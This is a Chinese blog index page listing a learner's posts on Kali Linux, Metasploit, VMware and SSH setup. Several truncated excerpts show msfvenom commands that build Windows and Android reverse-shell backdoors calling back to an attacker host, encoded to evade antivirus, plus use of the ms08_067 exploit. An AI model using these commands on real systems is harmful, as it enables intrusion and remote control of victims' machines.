- 博客(13)
- 资源 (21)
- 收藏
- 关注
RSS订阅原创 VM虚拟机陨石坑大全,不定期更新
0x01:无法打开已存在的虚拟机(虚拟机配置文件.vmx) 陨石坑- -更新时间:2018年8月13日07:09:04解决:把共享虚拟机关了就行了完成图:0x02:重启就没网络了,依稀记得折腾了我不止半个月因此还换过好几个虚拟机(陨石天坑不解释)更新时间:2018年8月13日07:11:02只需将VM的虚拟网络编辑器中关于 VMnet0 的设置改一下就行了:...
2018-08-13 07:19:21
584
原创 Kali的学习笔记篇(八)使用msf生成的shellcode制作免杀payload
环境: kali-linux-2018.2-amd.iso Visual Studio 2017 msfvenom 更新时间:2018年8月13日07:06:43直接注入的生成方式(一)://生成c格式的后门,-p指定模块,-e 指定编码,-i指定编码次数,-f 输出格式,-b 去除指定代码root@kali:~# msfvenom -p wi...
2018-08-13 03:18:10
6581
2
原创 kali的学习笔记篇(七)metasploit之PC后门
//生成后门//参数可参照第五篇文章:PC渗透参数集msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.1.113 LPORT=55555 -f exe > /root/muma.exe //选择模块use exploit/multi/handler//装载攻击载...
2018-08-12 07:37:24
1168
原创 白帽子讲web安全之浏览器安全(二)同源策略
(一)同源策略:源(Origin)浏览器最核心最基础的安全功能,web建立在同源策略之上。作用:限制了不同Origin之间的document和脚本,相互间不能干扰。影响Origin的因素有host(域名或IP地址)下方例子在a.com中加载了b.com的b.js,那么它的Origin就是a.com。<script src = https://b.com/b.js&g...
2018-08-12 03:51:36
331
原创 kali的学习笔记篇(一)基础入门
2018年7月30日 07:01:27环境:win10自带Hyper-v虚拟机系统:最新版2.0kali ISO镜像文件。kali-linux-2018.2-i386.iso在控制面板《开启哪些程序》里开启Hyper-v平台打开任务管理器点击性能点击CPU查看是否开启虚拟化,或者win+r输入msinfo32 拉到最下面看那四个关于虚拟化的是与否,要全部是才能开启虚拟化技...
2018-08-12 03:47:23
11131
1
原创 kali的学习笔记篇(五)metasploit之PC后门参数集
参数列表:show exploits列出metasploit框架中的所有渗透攻击模块。show payloads列出metasploit框架中的所有攻击载荷。show auxiliary列出metasploit框架中的所有辅助攻击载荷。search name查找metasploit框架中所有的渗透攻击和其他模块。info展示出指定渗透攻击或模块的相关信息。u...
2018-08-12 02:33:19
768
原创 kali的学习笔记篇(六)metasploit之安卓后门
环境: kali-linux-2018.-2-amd-64.iso android 支持外网监听0x01://生成安卓木马:msfvenom -p android/meterpreter/reverse_tcp LHOST=[myIP] LPORT=55555 R &amp;amp;amp;gt; [akpNAME].apk0x02://加载攻击模块use exploit/m...
2018-08-12 02:28:37
3522
3
原创 kali的学习笔记篇(四)metasploit之远控
看的是15年的老电影了(教程)msfpayload 15年就被丢弃了,搞了才发现被集成到msfvenom里了。生成木马:#参数 -p [指定攻击载荷名称]#参数 -f [指定payload的输出格式]#参数 -x 指定捆绑到哪个文件上 msfvenom -p windows/meterpreter/reverse_tcp LHOST=[myIP] LPORT=[myPORT] ...
2018-08-11 05:51:29
1458
原创 kali的学习笔记篇(三)Metasploit初试炼
exploit:利用漏洞payload:攻击载荷#进入msf控制台msfconsolehelp查看帮助信息show 显示攻击载荷开始攻击#装载攻击载荷选择windows系统模块/ms08_067漏洞use exploit/windows/smb/ms08_067_netapi#查看选项show options#选择目标set RHOST targetIP#...
2018-08-11 04:28:04
508
原创 Kali Linux / centOS 7 SSH踩过得坑(不定期更新)
0x00: 最近学习kali linux,闻之初是三年前了。随已不是从前计划中的自己,但也尽力去突破新的自己。 环境:kali-linux 2018-2amd64镜像0x01:关于ssh输入密码无法登陆的坑cause :一开始好好的,开机后就连接不上了。看了看/etc/ssh/ssh_config文件,少了很多配置,重装了很多遍还是这样解决:找遍百度基本都与我的配置不一样...
2018-08-11 00:26:11
2166
原创 putty vi右键不能黏贴
环境:kali2018镜像,Hyper-v虚拟机背景:在设置好ssh远程登录后使用putty打开source文件添加更新源结果复制的更新源右键无法黏贴, 解决:方法一:在普通模式下键入“ :set mouse-=a”(不包括引号)方法二:编辑 ~/.vimrc 文件,加入如下代码:if has('mouse') set mouse-=a endif方法一每次打开vi...
2018-08-10 04:35:19
3579
1
原创 关于linux下用户与组的安全知识(一)
环境:centOS 7搭建好了开发环境,接下来翻阅一些安全知识,打算从《白帽子讲web安全》中提及的最小权限原则开始对服务器进行安全部署。翻阅了一些关于linux下用户与组的知识,本人小白大佬略过。查看当前登录用户:whoami 一般回显root查看当前组内成员:groups查看所有用户:cat /etc/passwd ,查看活跃的用户列表cat w /etc/passw...
2018-08-02 04:12:44
281
原创 centOS 7配置ssh 限制ip登录
环境:centOS 7.0在网站备案完毕后部署完服务器打算进一步设置一些安全部署,网上搜罗了一些这方面的文章,打算先执行《白帽子讲web安全》中提及的最小权限原则。PS:因本人外网ip非固定ip除了方法一在putty中配置没问题外没有在其余外网ip亲测(- -公司也不搞个固定ip,我还能说啥)方法一:首先需要限制登录的ip(外网ip)XXX为外网IPVim /etc/hosts....
2018-08-02 03:06:46
10362
2
PrivatyRoom(隐私空间)
2018-08-02
一个简单的音乐播放器实例
2018-06-29
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人